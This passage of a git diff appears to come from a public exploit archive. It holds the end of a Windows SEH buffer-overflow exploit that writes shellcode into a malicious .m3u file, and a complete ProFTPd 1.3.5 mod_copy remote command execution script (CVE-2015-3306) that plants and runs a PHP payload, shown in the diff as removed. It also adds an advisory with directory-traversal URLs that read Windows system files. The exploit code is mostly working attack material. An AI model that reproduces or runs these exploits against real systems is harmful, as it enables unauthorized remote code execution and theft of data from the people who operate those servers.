+"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c" +"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69" +"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47" +"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec" +"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3" +"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57" +"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31" +"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc" +"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0" +"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27" +"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf" +"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb" +"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae") +buffer +=3D "\x42" * 350 +nseh =3D "\xEB\x06\x90\x90" +# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20 +seh=3D"\xee\x04\x01\x66" +#Jump back 603 bytes due to insufficient space for shellcode +jmpbck =3D "\xe9\xA5\xfd\xff\xff" +junk =3D ("D" * 55)=20 +f=3D open("exploit.m3u",'w') +f.write(buffer + nseh + seh + jmpbck + junk) +f.close() diff --git a/platforms/windows/remote/36803.py b/platforms/windows/remote/36803.py deleted file mode 100755 index 571b31bb1..000000000 --- a/platforms/windows/remote/36803.py +++ /dev/null @@ -1,47 +0,0 @@ -# Title: ProFTPd 1.3.5 Remote Command Execution -# Date : 20/04/2015 -# Author: R-73eN -# Software: ProFTPd 1.3.5 with mod_copy -# Tested : Kali Linux 1.06 -# CVE : 2015-3306 -# Greetz to Vadim Melihow for all the hard work . -import socket -import sys -import requests -#Banner -banner = "" -banner += " ___ __ ____ _ _ \n" -banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" -banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" -banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" -banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" -print banner -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -if(len(sys.argv) < 4): - print '\n Usage : exploit.py server directory cmd' -else: - server = sys.argv[1] #Vulnerable Server - directory = sys.argv[2] # Path accessible from web ..... - cmd = sys.argv[3] #PHP payload to be executed - evil = '' - s.connect((server, 21)) - s.recv(1024) - print '[ + ] Connected to server [ + ] \n' - s.send('site cpfr /etc/passwd') - s.recv(1024) - s.send('site cpto ' + evil) - s.recv(1024) - s.send('site cpfr /proc/self/fd/3') - s.recv(1024) - s.send('site cpto ' + directory + 'infogen.php') - s.recv(1024) - s.close() - print '[ + ] Payload sended [ + ]\n' - print '[ + ] Executing Payload [ + ]\n' - r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP - if (r.status_code == 200): - print '[ * ] Payload Executed Succesfully [ * ]' - else: - print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]' - -print '\n http://infogen.al/' \ No newline at end of file diff --git a/platforms/windows/remote/36915.txt b/platforms/windows/remote/36915.txt new file mode 100755 index 000000000..bee6e869a --- /dev/null +++ b/platforms/windows/remote/36915.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/52327/info + +NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks. + +NetDecision 4.6.1 is vulnerable; other versions may also be affected. + +http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini +http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini \ No newline at end of file